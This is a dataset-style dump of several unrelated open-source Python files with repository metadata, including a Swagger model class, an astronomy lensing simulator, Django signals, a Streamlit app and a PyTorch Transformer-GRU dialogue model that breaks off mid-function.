temp2=i
return ans | [
"[email protected]"
] | |
9bdfbf61dce36e4cf4db5e261bcab6169238f587 | 1289d4eb7e3b313ee21fa48cdd49d5af1772db0a | /main.py | d0e770d8fa33950549fa4ee9c2c436f232614fb0 | [] | no_license | ansko/Lato | a2ea6105d596ccd8874b7822b325b5921d18a70f | f5e3f8eca7af7e8f5eec649aaf8f848a6c367ef2 | refs/heads/master | 2021-01-11T02:12:45.651699 | 2016-10-15T20:07:07 | 2016-10-15T20:07:07 | 70,993,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | #!/usr/bin/env python3
# coding: utf-8
from atoms_class import Atoms
atoms = Atoms('co.50000.data')
print (atoms.atoms)
| [
"[email protected]"
] | |
69debec428098617652296bd578146c4657179a1 | caf6ae544fce3b332b40a03462c0646a32c913e1 | /master/python/swagger_client/models/deposit_id.py | 9d6a813e681197d9448474fe5c7f2b9e39942158 | [
"Apache-2.0"
] | permissive | coinsecure/plugins | 827eb0ce03a6a23b4819a618ee47600161bec1c7 | ad6f08881020c268b530d5242d9deed8d2ec84de | refs/heads/master | 2020-05-30T07:17:56.255709 | 2016-11-27T22:22:23 | 2016-11-27T22:22:23 | 63,496,663 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 3,799 | py | # coding: utf-8
"""
Coinsecure Api Documentation
To generate an API key, please visit <a href='https://coinsecure.in/api' target='_new' class='homeapi'>https://coinsecure.in/api</a>.<br>Guidelines for use can be accessed at <a href='https://api.coinsecure.in/v1/guidelines'>https://api.coinsecure.in/v1/guidelines</a>.<br>Programming Language Libraries for use can be accessed at <a href='https://api.coinsecure.in/v1/code-libraries'>https://api.coinsecure.in/v1/code-libraries</a>.
OpenAPI spec version: 1.0b
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class DepositID(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
DepositID - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'deposit_id': 'str'
}
self.attribute_map = {
'deposit_id': 'depositID'
}
self._deposit_id = None
@property
def deposit_id(self):
"""
Gets the deposit_id of this DepositID.
:return: The deposit_id of this DepositID.
:rtype: str
"""
return self._deposit_id
@deposit_id.setter
def deposit_id(self, deposit_id):
"""
Sets the deposit_id of this DepositID.
:param deposit_id: The deposit_id of this DepositID.
:type: str
"""
self._deposit_id = deposit_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
f038abaec86c975b455f314fe8312b6fb4f3a83f | 37930870719caede967fdf6905c032e22d086e8b | /scripts/imaging/simulators/instruments/vro.py | 0990c9c9733733002ed6eb4a3accc03e6b77e72d | [] | no_license | Cywtim/autolens_workspace | cbede944c0f85ee95cd7362fee957ef77e701280 | da40cafee8dc26e5d8b1041888fb280598e74a5e | refs/heads/master | 2023-04-05T14:22:06.091992 | 2021-04-15T20:29:28 | 2021-04-15T20:29:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,170 | py | """
Simulator: VRO
==============
This script simulates `Imaging` of a strong lens where:
- The resolution, PSF and S/N are representative of the Vera Rubin Observatory imaging.
"""
# %matplotlib inline
# from pyprojroot import here
# workspace_path = str(here())
# %cd $workspace_path
# print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
"""
The `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_name`
gives it a descriptive name. They define the folder the dataset is output to on your hard-disk:
- The image will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/image.fits`.
- The noise-map will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/noise_map.fits`.
- The psf will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/psf.fits`.
"""
dataset_type = "instruments"
dataset_instrument = "vro"
"""
The path where the dataset will be output, which in this case is:
`/autolens_workspace/dataset/imaging/instruments/vro/mass_sie__source_sersic`
"""
dataset_path = path.join("dataset", "imaging", dataset_type, dataset_instrument)
"""
For simulating an image of a strong lens, we recommend using a Grid2DIterate object. This represents a grid of (y,x)
coordinates like an ordinary Grid2D, but when the light-profile`s image is evaluated below (using the Tracer) the
sub-size of the grid is iteratively increased (in steps of 2, 4, 8, 16, 24) until the input fractional accuracy of
99.99% is met.
This ensures that the divergent and bright central regions of the source galaxy are fully resolved when determining the
total flux emitted within a pixel.
"""
grid = al.Grid2DIterate.uniform(
shape_native=(100, 100), pixel_scales=0.2, fractional_accuracy=0.9999
)
"""
Simulate a simple Gaussian PSF for the image.
"""
psf = al.Kernel2D.from_gaussian(
shape_native=(21, 21), sigma=0.5, pixel_scales=grid.pixel_scales, normalize=True
)
"""
To simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,
noise levels and psf of the dataset that is simulated.
"""
simulator = al.SimulatorImaging(
exposure_time=100.0, psf=psf, background_sky_level=1.0, add_poisson_noise=True
)
"""
Setup the lens galaxy's mass (SIE+Shear) and source galaxy light (elliptical Sersic) for this simulated lens.
"""
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
"""
Use these galaxies to setup a tracer, which will generate the image for the simulated `Imaging` dataset.
"""
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
"""
Lets look at the tracer`s image, this is the image we'll be simulating.
"""
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid)
tracer_plotter.figures_2d(image=True)
"""
We can now pass this simulator a tracer, which creates the ray-traced image plotted above and simulates it as an
imaging dataset.
"""
imaging = simulator.from_tracer_and_grid(tracer=tracer, grid=grid)
"""
Lets plot the simulated `Imaging` dataset before we output it to fits.
"""
imaging_plotter = aplt.ImagingPlotter(imaging=imaging)
imaging_plotter.subplot_imaging()
"""
Output the simulated dataset to the dataset path as .fits files.
"""
imaging.output_to_fits(
image_path=path.join(dataset_path, "image.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
overwrite=True,
)
"""
Output a subplot of the simulated dataset, the image and a subplot of the `Tracer`'s quantities to the dataset path
as .png files.
"""
mat_plot_2d = aplt.MatPlot2D(
title=aplt.Title(label="Vero Rubin Observator Image"),
output=aplt.Output(path=dataset_path, format="png"),
)
imaging_plotter = aplt.ImagingPlotter(imaging=imaging, mat_plot_2d=mat_plot_2d)
imaging_plotter.subplot_imaging()
imaging_plotter.figures_2d(image=True)
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid, mat_plot_2d=mat_plot_2d)
tracer_plotter.subplot_tracer()
"""
Pickle the `Tracer` in the dataset folder, ensuring the true `Tracer` is safely stored and available if we need to
check how the dataset was simulated in the future.
This will also be accessible via the `Aggregator` if a model-fit is performed using the dataset.
"""
tracer.save(file_path=dataset_path, filename="true_tracer")
"""
The dataset can be viewed in the folder `autolens_workspace/imaging/instruments/vro`.
"""
| [
"[email protected]"
] | |
f5316c97b47c37037e7f7584f2ad11d62837711b | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Minecraft/pip/tests/test_help.py | b5a5f8aaba7742dfff1f6d49f2ba7a46eab76da7 | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:8a2ef4075a758034598401082ccea67056274e743bd8d3b71c91deb8be2b8201
size 1835
| [
"[email protected]"
] | |
a92d28836676c2ebdd4e48ad6ba6b45f2ddd5ddd | fd0eecb6d4f12eb326030c2f64892c6845668c4f | /docs/files/ros-service-call-logger.py | 69929603c94693f175fcbc0234197cc7350d0cb4 | [
"MIT"
] | permissive | gramaziokohler/roslibpy | 599eff049caa72ca0f23dbc8e4058e051e66556b | 55e8f396f9e7b5d5669f6a31c2ed8d9bc33c3400 | refs/heads/main | 2023-08-31T22:57:32.502924 | 2023-03-29T14:52:31 | 2023-03-29T14:52:31 | 119,359,521 | 245 | 58 | MIT | 2023-08-29T14:22:35 | 2018-01-29T09:13:24 | Python | UTF-8 | Python | false | false | 333 | py | import roslibpy
client = roslibpy.Ros(host='localhost', port=9090)
client.run()
service = roslibpy.Service(client, '/rosout/get_loggers', 'roscpp/GetLoggers')
request = roslibpy.ServiceRequest()
print('Calling service...')
result = service.call(request)
print('Service response: {}'.format(result['loggers']))
client.terminate()
| [
"[email protected]"
] | |
70b061e799152084ad6f729509a14852526468f9 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /PHY_604_Computational_Methods_in_Physics_and_Astrophysics_II_Zingale/code1/monte_carlo/uniform_random/random_test.py | f5d708344cd250ad2e460372c9cb612844584e80 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 919 | py | # Do a simple random number generator based on the linear congruential
# generator
import matplotlib.pyplot as plt
class Rand(object):
def __init__(self, seed):
self.seed = seed
self.a = 16807 # 7**5
self.c = 0
self.M = 2147483647 # 2**31 -1
def ran(self):
xn = (self.a*self.seed + self.c) % self.M
self.seed = xn
# note that by dividing by M and not M-1, we will never get 1,
# so this gives #s in the range [0, 1)
return xn/float(self.M)
def test_random():
r = Rand(1)
x = []
for i in range(10000):
x.append(r.ran())
# make pairs out of successive points
x1 = x[1:]
x = x[:-1]
plt.scatter(x, x1, s=5)
plt.xlabel(r"$x_i$")
plt.ylabel(r"$x_{i+1}$")
plt.xlim(0,1)
plt.ylim(0,1)
plt.savefig("random.png", dpi=150)
if __name__ == "__main__":
test_random()
| [
"[email protected]"
] | |
ad8452aa80df9bf192b29494939440d87bd2230d | 9a2b9a3873984e9f99cdc92be7d98af279fae36b | /app/users/locusts.py | c3021a34c5118e8f3272dba542cf12d9d34e453e | [] | no_license | jeonyh0924/celery-test | 4bf3832ef5e4175c7615051ccaefa131b65a01af | aad15232141d1f2ad69c5438030e9fcd707b6efa | refs/heads/master | 2022-11-26T05:21:48.885913 | 2020-08-06T11:05:49 | 2020-08-06T11:05:49 | 284,411,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | import random
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task
def index_page(self):
self.client.get("/health")
def on_start(self):
pass
| [
"[email protected]"
] | |
76c69c71e2615a87f13d8098ced49b2265c3c1e8 | 3490103f9c3773a717b37c3e6bedc88b9cd83cd2 | /setup.py | dd45809284ae6bf607d2dff2a2b681e1afbcbacd | [] | no_license | vuchau/django-project-template | 66cd4bf08c4b61be53d8aaed5e34d48b54901682 | 2510e82d50a705429cda96d7912d5056313c29b9 | refs/heads/master | 2021-01-18T08:05:53.465031 | 2015-01-24T22:12:12 | 2015-01-24T22:12:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | from setuptools import setup
from distutils.core import Command
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from django.conf import settings
settings.configure(
DATABASES={
'default': {
'NAME': ':memory:',
'ENGINE': 'django.db.backends.sqlite3'
}
},
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'toolbox',
)
)
from django.core.management import call_command
call_command('test', 'toolbox')
setup(
name='django-project-template',
cmdclass={'test': TestCommand}
)
| [
"[email protected]"
] | |
a1e6e1348803e6d405076ffca4ed431681dfba1a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02781/s238378799.py | 717eeb5e77e1996b57354ee94c94ba90683c2808 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | #!/usr/bin/env python3
#%% for atcoder uniittest use
import sys
input= lambda: sys.stdin.readline().rstrip()
sys.setrecursionlimit(10**9)
def pin(type=int):return map(type,input().split())
def tupin(t=int):return tuple(pin(t))
def lispin(t=int):return list(pin(t))
#%%code
def resolve():
N=input()
K,=pin()
#degit DP
#dp_table["index"][smaller][cond]=cond:=ちょうどK個の数がある を満たす総数
rb=(0,1)
dp_table=[[[0 for cnd in range(K+1)]for sml in rb]for ind in range(len(N)+1)]
dp_table[0][0][0]=1
#print(dp_table)
#print("degit,sml,k,prove,l,x<n,dp_table[degit-1][sml][k]")#
for degit in range(len(N)+1):
n=int(N[degit-1])
for sml in rb:
t=10 if sml else int(N[degit-1])+1
for k in range(K+1):
for prove in range(t):
x=prove
try:#Indexerror
#print(degit,sml,k,prove,"l",x<n,dp_table[degit-1][sml][k])
#if sml==False and x==n:print(n,":")
dp_table[degit][sml or x<n][k+(x!=0)]+=dp_table[degit-1][sml][k]
except :pass
print(dp_table[-1][0][K]+dp_table[-1][1][K])
#print(dp_table)
#%%submit!
resolve()
| [
"[email protected]"
] | |
e117f4ebaad212623fc1ca4c75b0ce427a5091d7 | 501d029b5db8132feb1877f5e0898af7a301c910 | /ex3_1.py | 360851c26a0bb82dc626470c97dff2bdb4d8a0da | [] | no_license | Everfighting/Learn-Python-the-Hard-Way | 092b050d53bfca0f5bbc91e41ba1aacce2880cc1 | 51723bfc22472284b3902161627331882f0dbc6f | refs/heads/master | 2020-04-05T22:55:02.550343 | 2017-08-22T06:13:36 | 2017-08-22T06:13:36 | 61,793,170 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | # coding=utf-8
import math
# 利用math模块中的乘方进行计算。
print math.pow(5,2)
# 利用内置算术运算符乘方
print 5**2
# 地板除,如果是整数相除,结果只是整数,小数部分去除。
# 在python3.0以上版本/结果含有小数,//才是地板除。
print 5/3 | [
"[email protected]"
] | |
eff753209513dfc927dc91a5466b6ddf7519166d | 98364abec1f798ed6352a1c0eda080371aacb28d | /Medium/729/729.py | fa51d5f4b2ef64dd9ed676a463da821bf4475276 | [] | no_license | GuoYunZheSE/Leetcode | 3d1b11d142734922acecf7ba5efbaf0f2ab26d81 | 45cabf05251711c6421c8c2ddbcc3fec9222f70a | refs/heads/master | 2022-05-01T05:03:20.694729 | 2022-04-27T04:10:33 | 2022-04-27T04:10:33 | 161,486,806 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,414 | py | import bisect
class MyCalendar:
# def __init__(self):
# self.left=None
# self.right=None
# self.available=[]
# def book(self, start: int, end: int) -> bool:
# if (start and end) or (start==0 and end) :
# if start<=end:
# # First Book
# if self.left==None:
# self.left=start
# self.right=end
# return True
# else:
# if end<=self.left :
# if end!=self.left:
# self.available.append((end,self.left))
# self.left=start
# return True
# if start>=self.right:
# if start!=self.right:
# self.available.append((self.right,start))
# self.right=end
# return True
# else:
# if len(self.available)>0:
# for inter in self.available:
# if inter[0]<=start and end<=inter[1]:
# self.available.remove(inter)
# if inter[0]!=start:
# self.available.append((inter[0],start))
# if inter[1]!=end:
# self.available.append((end,inter[1]))
# return True
# return False
# return False
# else:
# return False
# else:
# return False
def __init__(self):
self.arr = []
self.dict = {}
def book(self, start: int, end: int) -> bool:
if start in self.dict:
return False
if not self.arr:
self.arr.append(start)
self.dict[start] = end
return True
i = bisect.bisect_left(self.arr, start)
if i - 1 >= 0 and self.dict[self.arr[i - 1]] > start:
return False
if i < len(self.arr) and self.arr[i] < end:
return False
self.arr.insert(i, start)
self.dict[start] = end
return True
if __name__ == '__main__':
S=MyCalendar()
S.book(48,50)
print(S.book(0,6)) | [
"[email protected]"
] | |
f5b80ad74e9f4b8489d21edb746c9938cea79745 | 43f3b7e4a5b7a1210ffa72c5a855d7542d68290d | /Results/Python/Array/134.py | 69581275b8fe467b583b69841182a4af0fcb49ac | [] | no_license | bar2104y/Abramyan_1000_tasks | 38e86e119245db4bac0483583cc16d8793d5689c | e0bf9f5e73d90b8eca3fe5ba7913ed12f18d989a | refs/heads/master | 2021-06-05T18:05:09.788453 | 2020-06-30T19:52:31 | 2020-06-30T19:52:31 | 150,898,700 | 5 | 2 | null | 2018-10-02T17:16:28 | 2018-09-29T20:01:33 | Python | UTF-8 | Python | false | false | 569 | py | import math
from genarr import genRandomArr
x,y = [], []
n = int(input("N: "))
# for i in range(n):
# x.append(int(input("X: ")))
# y.append(int(input("Y: ")))
x,y = genRandomArr(n,-10,10), genRandomArr(n,-10,10)
def distanse(x1,y1,x2,y2):
return(math.sqrt((x2-x1)**2 + (y2-y1)**2))
maxd = 0
for i in range(len(x)):
print((x[i],y[i]))
for j in range(i+1,len(x)):
d = distanse(x[i],y[i],x[j],y[j])
if d > maxd:
ii,jj = i,j
maxd = d
print((x[ii],y[ii]), (x[jj],y[jj]), distanse(x[ii],y[ii], x[jj],y[jj]))
| [
"[email protected]"
] | |
92addd01fb60c32929e5a515f5a438f96f32715b | 560c5d8226d74969c3fb467efd1d26178562e15c | /blog_api/users/signals.py | dcc3fa9d8133adbb65fc08daa0e17af6aee7ccfc | [
"MIT"
] | permissive | beasyx0/blog_api | 17f47fb1537d4b7e53822bbff507740363d909cc | 8d984ee3f9b2b7ea35a847013743f236a1a67fdb | refs/heads/main | 2023-06-30T02:08:40.190270 | 2021-08-04T02:09:53 | 2021-08-04T02:09:53 | 358,662,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | from django.contrib.auth.signals import user_logged_in # user_logged_out, user_login_failed
from django.db.models import signals
from django.dispatch import Signal
from django.db import transaction
from django.dispatch import receiver
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.contrib.auth import get_user_model
User = get_user_model()
from blog_api.users.models import User, VerificationCode, PasswordResetCode
@receiver(signals.post_save, sender=User)
def send_user_verification_email_signal(sender, instance, created, **kwargs):
'''Send user a verification email on first save.'''
if created:
code = VerificationCode.objects.create(user_to_verify=instance)
transaction.on_commit(
lambda: code.send_user_verification_email()
)
new_registration = Signal(providing_args=["ip_address", "user_username"])
@receiver(new_registration)
def record_ip_on_new_registration(sender, task_id, **kwargs):
username = kwargs['user_username']
ip_address = kwargs['ip_address']
user = get_object_or_404(User, username=username)
user.ip_address = ip_address
user.save()
| [
"[email protected]"
] | |
b797535219742d7c8b142f1d14633ac6f9165b4d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_138/1275.py | c8fd42dd2af78c90831cb28164d298f384b5d870 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | import os, sys
import itertools
lines = [line.strip() for line in open("%s" % sys.argv[1]).readlines()]
lines.reverse()
cases = lines.pop()
for case in range(int(cases)):
lines.pop()
lowers, highers = [], []
N = sorted(map(float,lines.pop().split(' ')))
K = sorted(map(float,lines.pop().split(' ')))
for i, n in enumerate(N):
try:
lower = max(filter(lambda x: x<n and x not in lowers, K))
lowers.append(lower)
except:
lower = None
try:
higher = max(filter(lambda x: x>n and x not in highers, K))
highers.append(higher)
except:
higher = None
print "Case #%s:" % (case+1),
print len(lowers),
print len(filter(lambda x: x[0] >x[1], [(n,K.pop(K.index(min(filter(lambda x: x>n, K) or K)))) for n in N])) | [
"[email protected]"
] | |
fc717f0194925a31c30c22421f8fd0d344685fb7 | 14a6662a1b0a6d113dfb724382e3a7e2735bbbac | /Aula04/src/app.py | a75434ebdf760bdece64d6668611e4858a65f6f3 | [] | no_license | Karagul/streamlit_bootcamp | c118c01d9bec354eaabb504c9fd1d59dc5c63c93 | 48fa703ce7a2d4ac003fe881220cb66d926f17ca | refs/heads/main | 2023-02-08T20:57:31.280465 | 2021-01-05T14:36:35 | 2021-01-05T14:36:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def carrega_dados(caminho):
dados = pd.read_csv(caminho)
return dados
def grafico_comparativo(dados_2019, dados_2020, causa, estado="BRASIL"):
if estado == "BRASIL":
total_2019 = dados_2019.groupby("tipo_doenca").sum()
total_2020 = dados_2020.groupby("tipo_doenca").sum()
lista = [int(total_2019.loc[causa]), int(total_2020.loc[causa])]
else:
total_2019 = dados_2019.groupby(["uf", "tipo_doenca"]).sum()
total_2020 = dados_2020.groupby(["uf", "tipo_doenca"]).sum()
lista = [int(total_2019.loc[estado, causa]),
int(total_2020.loc[estado, causa])]
dados = pd.DataFrame({"Total": lista,
"Ano": [2019, 2020]})
#plt.figure(figsize=(8, 6))
return sns.barplot(x="Ano", y="Total", data=dados)
#plt.title(f"Óbitos por {causa} - {estado}")
# plt.show()
def main():
obitos_2019 = carrega_dados("dados/obitos-2019.csv")
obitos_2020 = carrega_dados("dados/obitos-2020.csv")
figura = grafico_comparativo(obitos_2019, obitos_2020,
"SRAG")
st.title("Análise de Óbitos 2019-2020")
st.markdown("Este trabalho analisa dados dos **óbitos 2019-2020**")
st.pyplot(figura)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
5e7bfbedc16acf4ca6372e3a2381661d385fbfa6 | 092894284a5c5f29ff7d9323b854eb6781c64fab | /Res/Prefabs/GameObjects/player/ball.py | d9a59ff63f5dc80128a7526049375b631cd7da2a | [] | no_license | sourenaKhanzadeh/breakoutgame | 4660809ceae23b7b1bf587cc1bd6f94141f3c16f | 87ee5933c6dde22f74ee22e5f40d016a4a4b22e9 | refs/heads/master | 2020-05-22T07:17:27.345601 | 2019-05-29T21:25:21 | 2019-05-29T21:25:21 | 186,262,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | from Prefabs.GameObjects.shapes.shapes import *
from Prefabs.GameObjects.bricks.bricks import Brick
from setting import *
class Ball(Circle):
def __init__(self, x=WIDTH // 2, y=WIDTH // 2, color=CC.RED, width=0, rad=10):
super().__init__(x, y, color, width, rad)
def move(self):
# go east if less than WIDTH
if self.getX() + self.getRad() + self.dx > WIDTH:
self.dx = -self.dx
# go west if less than WIDTH
elif self.getX() - (self.getRad() - self.dx) < 0:
self.dx = -self.dx
# if hit the up screen bounce down
if self.getY() + self.getRad() < 0:
self.dy = -self.dy
# debug the ball
self.debug(DEBUG)
# move x axis
self.incX(self.dx)
# move y axis
self.decY(self.dy)
def debug(self, active):
if active:
if self.getY() > HEIGHT:
self.setY(0)
def collision(self, col:Shape):
# very simple ball collision logic
if self.getY() - self.dy == col.getY() and \
col.getX() <= self.getX() <= col.getX() + col.getW():
self.dy = -self.dy
# if the collided is a brick then change the hit number of the brick
if len(col) == OO.BRICKS:
col.hits -= 1
def __len__(self):
return OO.BALL
| [
"soure@DESKTOP-6PVNFEF.(none)"
] | soure@DESKTOP-6PVNFEF.(none) |
7c573466c7626d57389f1b8b68c257affd3f7dbc | f0bd86b187fef18409d4c55e5760b17ee549ce13 | /model/seq2seq_transformer.py | 92934239576698eb48edc982811a459c38532e5a | [
"MIT"
] | permissive | wyu-du/MultiTurnDialogZoo | da095953f4cbc3c907bbf2600734d426f4651da8 | ac6a5d4fee31aef9db86ffef599d70f099d93897 | refs/heads/master | 2022-11-17T07:13:38.403151 | 2020-07-19T21:00:20 | 2020-07-19T21:00:20 | 273,569,164 | 0 | 0 | MIT | 2020-06-19T19:14:24 | 2020-06-19T19:14:24 | null | UTF-8 | Python | false | false | 27,364 | py | #!/usr/bin/python3
# Author: GMFTBY
# Time: 2020.2.7
'''
Seq2Seq in Transformer, implemented by Pytorch's nn.Transformer
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.init as init
import math
import random
import numpy as np
import pickle
import ipdb
import sys
import types
import transformers
from .layers import *
class Decoder(nn.Module):
'''
Add the multi-head attention for GRU
'''
def __init__(self, embed_size, hidden_size, output_size,
n_layers=2, dropout=0.5, nhead=8):
super(Decoder, self).__init__()
self.embed_size, self.hidden_size = embed_size, hidden_size
self.output_size = output_size
self.embed = nn.Embedding(output_size, embed_size)
self.multi_head_attention = nn.ModuleList([Attention(hidden_size) for _ in range(nhead)])
self.attention = Attention(hidden_size)
self.rnn = nn.GRU(hidden_size + embed_size,
hidden_size,
num_layers=n_layers,
dropout=(0 if n_layers == 1 else dropout))
self.out = nn.Linear(hidden_size, output_size)
self.ffn = nn.Linear(nhead*hidden_size, hidden_size)
self.init_weight()
def init_weight(self):
# orthogonal inittor
init.xavier_normal_(self.rnn.weight_hh_l0)
init.xavier_normal_(self.rnn.weight_ih_l0)
self.rnn.bias_ih_l0.data.fill_(0.0)
self.rnn.bias_hh_l0.data.fill_(0.0)
def forward(self, inpt, last_hidden, encoder_outputs):
# inpt: [batch]
# last_hidden: [2, batch, hidden_size]
embedded = self.embed(inpt).unsqueeze(0) # [1, batch, embed_size]
# attn_weights: [batch, 1, timestep of encoder_outputs]
key = last_hidden.sum(axis=0)
# calculate the attention
context_collector = []
for attention_head in self.multi_head_attention:
attn_weights = attention_head(key, encoder_outputs)
context = attn_weights.bmm(encoder_outputs.transpose(0, 1))
context = context.squeeze(1).transpose(0, 1) # [hidden, batch]
context_collector.append(context) # [N, hidden, batch]
context = torch.stack(context_collector).view(-1, context.shape[-1]).transpose(0, 1) # [N, hidden, batch]
# context = context.view(-1, context.shape[-1]).transpose(0, 1) # [batch, N*hidden]
context = torch.tanh(self.ffn(context)).unsqueeze(0) # [1, batch, hidden]
# context: [batch, 1, hidden_size]
# context = attn_weights.bmm(encoder_outputs.transpose(0, 1))
# context = context.transpose(0, 1)
rnn_input = torch.cat([embedded, context], 2)
output, hidden = self.rnn(rnn_input, last_hidden)
output = output.squeeze(0)
# context = context.squeeze(0)
# [batch, hidden * 2]
# output = self.out(torch.cat([output, context], 1))
output = self.out(output) # [batch, output_size]
output = F.log_softmax(output, dim=1)
# output: [batch, output_size]
# hidden: [2, batch, hidden_size]
# hidden = hidden.squeeze(0)
return output, hidden
class Transformer(nn.Module):
'''
Transformer encoder and GRU decoder
Multi-head attention for GRU
'''
def __init__(self, input_vocab_size, opt_vocab_size, d_model, nhead,
num_encoder_layers, dim_feedforward, position_embed_size=300,
utter_n_layer=2, dropout=0.3, sos=0, pad=0, teach_force=1):
super(Transformer, self).__init__()
self.d_model = d_model
self.hidden_size = d_model
self.embed_src = nn.Embedding(input_vocab_size, d_model)
# position maxlen is 5000
self.pos_enc = PositionEmbedding(d_model, dropout=dropout,
max_len=position_embed_size)
self.input_vocab_size = input_vocab_size
self.utter_n_layer = utter_n_layer
self.opt_vocab_size = opt_vocab_size
self.pad, self.sos = pad, sos
self.teach_force = teach_force
encoder_layer = nn.TransformerEncoderLayer(d_model=d_model, nhead=nhead,
dim_feedforward=dim_feedforward,
dropout=dropout, activation='gelu')
self.encoder = nn.TransformerEncoder(encoder_layer,
num_layers=num_encoder_layers)
self.decoder = Decoder(d_model, d_model, opt_vocab_size,
n_layers=utter_n_layer, dropout=dropout, nhead=nhead)
def generate_key_mask(self, x, lengths):
# x: [seq, batch]
# return: key mask [batch, seq]
seq_length = x.shape[0]
masks = []
for sentence_l in lengths:
masks.append([False for _ in range(sentence_l)] + [True for _ in range(seq_length - sentence_l)])
masks = torch.tensor(masks)
if torch.cuda.is_available():
masks = masks.cuda()
return masks
def forward(self, src, tgt, lengths):
# src: [seq, batch], tgt: [seq, batch], lengths: [batch]
